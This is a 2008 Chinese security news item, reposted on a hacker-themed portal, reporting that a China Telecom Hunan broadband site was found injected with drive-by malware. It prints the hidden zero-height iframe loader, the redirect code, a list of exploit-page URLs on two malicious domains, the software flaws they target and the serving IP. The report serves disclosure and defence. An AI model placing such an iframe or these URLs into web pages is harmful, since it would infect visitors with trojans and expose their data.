黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客新闻 >> 最新入侵 >> 正文
·没有路由密码权限时的鸽子08-23·彻底禁用暴风顽固进程 让系12-02
·强势破解网吧组策略的最新12-01·三种方法教你查看计算机的12-01
·万网虚拟机漏洞黑客获得VI11-30·网络管理员对付DDoS攻击的11-30
·关于工作组环境下对单独用11-28·U盘安装光盘版WINXP.ISO的11-28
·使用System Center部Win 211-28·另类技巧:使用DOS收发MAI11-28
·两种制作系统快速启动的方11-28·渗透本地网通主站11-26
·对某软件公司的一次安全检11-26·注入MSSQL 2005的工具- JC11-26
·攻防实战 步步渗透网站获得11-25·登录服务器失败,Win2008自11-25
·激发潜能 逼出Vista防火墙11-25·xKungfoo上的网马猥亵技巧11-22
·系统自带不起眼但又很强的11-22·IP和MAC捆绑的破解11-21
·揭秘Windows系统的四个后门11-21·Win2008网络访问保护把关 11-21
·玩转Win2008系统命令秀出网11-20·Windows XP系统的五大变形11-20
·恢复系统的闪存也能随便借11-20·Web安全测试之跨站请求伪造11-20
·利用跨站脚本攻击(XSS)摧毁11-20·对韩国某CMS的一次安全检测11-20
中国电信湖南公司宽带家园网站被植入恶意代码
      ★★★★★

中国电信湖南公司宽带家园网站被植入恶意代码

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-12-3 10:11:40

  知道创宇安全团队于29日捕获中国电信湖南公司宽带家园网站被植入恶意代码,用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息.
  MalUrl: hxxp://home.hn.vnet.cn
  访问该页面会被365门神拦截恶意攻击:


  该页面代码如下:
  <iframe src=http://www.pznylsf.cn/jzll/0.htm width=50 height=0 border=0></iframe>  <html><body onLoad=setTimeout(”location.href=’NetHomeWeb/welcomenethome.jsp’”,0)><font size=2 color=blue></font><meta http-equiv=’refresh’ content=’0;url=NetHomeWeb/welcomenethome.jsp’></body></html>
  访问该域名会先执行顶部的IFRAME隐藏挂马,然后再通过refresh跳转至主页。
  该iframe代码及其不稳定,初步估计是IDC机房内部被ARP攻击,强制在页面代码顶部加上恶意代码。
  mass iframe:hxxp://www.pznylsf.cn/jzll/0.htm
  [wide]http://www.pznylsf.cn/jzll/0.htm
  [frame]http://zlwrnm11.cn/a277/fxx.htm
  [frame]http://zlwrnm11.cn/a277/fx.htm
  [frame]http://zlwrnm11.cn/a277/ss.html
  [frame]http://zlwrnm11.cn/a277/Ms06014.htm
  [frame]http://zlwrnm11.cn/sina.htm
  [frame]http://zlwrnm11.cn/UU.htm
  [frame]http://zlwrnm11.cn/a277/Thunder.html
  [frame]http://zlwrnm11.cn/a277/GLWORLD.html
  [frame]http://zlwrnm11.cn/a277/real.htm
  [frame]http://zlwrnm11.cn/a277/Real.html
  攻击者使用了flash,snapshot,ms06-014,新浪网络电视,uusee,迅雷,联众,RealPlayer10/11的漏洞进行攻击。
  该恶意页面存放于近期及其活跃的恶意代码散播网段:
  www.pznylsf.cn => 59.34.216.139
  ·本站主数据: 广东省 湛江市 电信
  ·本站辅数据: 广东省湛江市电信机房 [提供:]
  ·参考数据一: 广东省湛江市 电信ADSL
  ·参考数据二: 广东省湛江市 电信

新闻录入:cainiaowang    责任编辑:xinlian 
  • 上一篇新闻:

  • 下一篇新闻: 没有了
    • 【字体:
    中介交易区
    最 新 热 门
    雅虎发布08年10大搜索关键词布兰12-03
    Windows桌面市场份额首次跌破90%12-03
    AMD Catalyst驱动爆乌龙双卡用户12-03
    揭秘南方山寨本制造链幕后实情12-03
    联发科称“死机短信”不会伤害手12-03
    中国电信湖南公司宽带家园网站被12-03
    7000段视频被篡改手机中国视频中12-03
    中央电视台音乐频道惊现黑客漏洞12-03
    堤防病毒利用微软MS07-017漏洞传12-02
    江民提醒:多面杀手利用u盘等传播12-02
    相 关 文 章
    恶意代码黑手现身
    在线视频将成为传播恶意代码新载体
    调查:八月全球一半恶意代码网站来自中
    赛门铁克修正诺顿高危漏洞 黑客可运行恶
    关于恶意代码及木马清除
    Adobe Photoshop曝高危漏洞 恶意代码被
    Websense:新型假冒补丁恶意代码电子邮
    MySpace网页遭黑客入侵被植入恶意代码
    OpenOffice蠕虫传播 开源成恶意代码新目
    恶意代码网站每天新增9500个
    Google欲对网页安全审查 减轻恶意代码威
    网络搜索引擎调查发现10%的网页包含恶意
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886